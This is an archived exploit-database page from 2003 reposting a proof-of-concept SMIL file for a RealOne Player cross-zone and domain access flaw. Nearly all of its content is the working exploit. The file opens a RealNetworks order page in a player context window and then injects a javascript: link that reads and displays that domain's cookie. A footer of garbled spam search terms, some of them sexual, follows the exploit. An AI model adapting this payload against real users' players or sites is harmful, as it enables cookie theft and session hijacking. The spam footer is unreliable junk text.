about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , RealOne Player Cross Zone and Domain Access Exploit



2003-08-28 RealOne Player Cross Zone and Domain Access Exploit
// This SMIL file will read the cookie from
https://order.real.com/pt/order.html. 
// The cookie will be read 9 seconds after the audio has begun.


<smil xmlns="http://www.w3.org/2001/SMIL20/Language" 
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
 <head>
  <meta name="title" content="DigitalPranksters.com
Proof of Concept"/>
  <meta name="author"
content="DigitalPranksters.com"/>
  <meta name="copyright" content="(c)2003
DigitalPranksters.com"/>
 </head>
 <body>
  <audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio
/real/live.ram?service=vr">
   <area href="https://order.real.com/pt/order.html"
begin="1s" external="true" 
 actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
    <rn:param name="width" value="10"/>
    <rn:param name="height" value="10"/>
   </area>
   <area href="javascript:alert('Hi there!  I\'m a digital
prankster.  I just read your cookie 
from ' + document.domain +
 ' over the ' + location.protocol + '// protocol.\n\nThe value was:\n' +
document.cookie + 
'\n\nHave a nice day.')" 
begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
  </audio>
 </body>
</smil> 


securitydot.net - 2003-08-28

Advertising

Copyright 2007, SecurityDot
Sat, 12 Dec 2009 02:10:32 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.yinbia +sex+video Wwwxx www.shitan Selebriti ppman.cn www.shop02 test.php WWW.video +Www.teen+ ppman.cn hot sex wo ppman.cn ppman.cn Kerala sex mambo Remo 50pic www.sexved Gunz rocke apach 1.3. %2Fcompone Sexcy clip phpBB+Mult ppman.cn ppman.cn addguest.h ppman.cn www.imeee. msrpc %2Fadminis WWW.XXX89. PK.BEACH WWW.PINKW /search/ex saurus.htm administra Kareena ka www.imeee. WWW.XXX89. news for C ppman.cn Samba 3.0 www.daikua wwwsexocom %252Fnuseo %20for%20w %...s gall Microsoft nuke searc www.tudom.